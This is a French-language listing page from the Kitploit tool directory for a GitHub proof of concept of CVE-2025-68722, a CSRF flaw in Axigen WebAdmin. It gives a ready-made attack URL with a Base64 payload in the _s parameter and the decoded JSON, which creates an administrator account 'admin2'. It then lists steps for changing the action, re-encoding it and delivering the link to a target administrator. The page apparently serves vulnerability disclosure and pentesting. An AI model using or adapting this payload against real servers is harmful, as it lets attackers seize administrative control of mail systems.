Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/osmancanvural/cve-2025-68722
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionArticles et RechercheApprentissage et Éducation
GitHubosmancanvural/cve-2025-68722

CVE-2025-68722

Axigen WebAdmin Vulnérabilité CSRF

Voir le dépôt
1il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-68722 : CSRF Axigen WebAdmin

Résumé de la vulnérabilité

Les actions critiques de changement d'état dans l'interface Axigen WebAdmin sont accessibles via des requêtes GET. Alors que le jeton _h protège contre la CSRF directe, l'application traite les requêtes mises en file d'attente via le paramètre _s (breadcrumb) immédiatement après l'authentification d'un utilisateur.

Un attaquant peut créer une URL contenant une charge utile encodée en Base64 dans le paramètre _s. Si un administrateur clique sur ce lien et termine le processus de connexion, l'action mise en file d'attente est exécutée automatiquement dans son contexte.

Versions concernées : < 10.6.26

Pour plus d'informations, consultez la base de connaissances Axigen.


POC

URL cible : https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19

Télécharger l’outil

Charge utile décodée (paramètre _s) :

root@kitploit:~
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}

Étapes pour reproduire :

  1. Modifier : Changez la charge utile JSON pour cibler différentes actions administratives (par exemple, modifier les paramètres du serveur).
  2. Encoder : Ré-encodez le JSON modifié en Base64.
  3. Livrer : Remplacez la valeur du paramètre _s dans l'URL d'attaque et livrez-la à un administrateur cible.
  4. Déclencher : Lors de la connexion via ce lien, le compte admin2 est créé (ou votre action personnalisée est exécutée).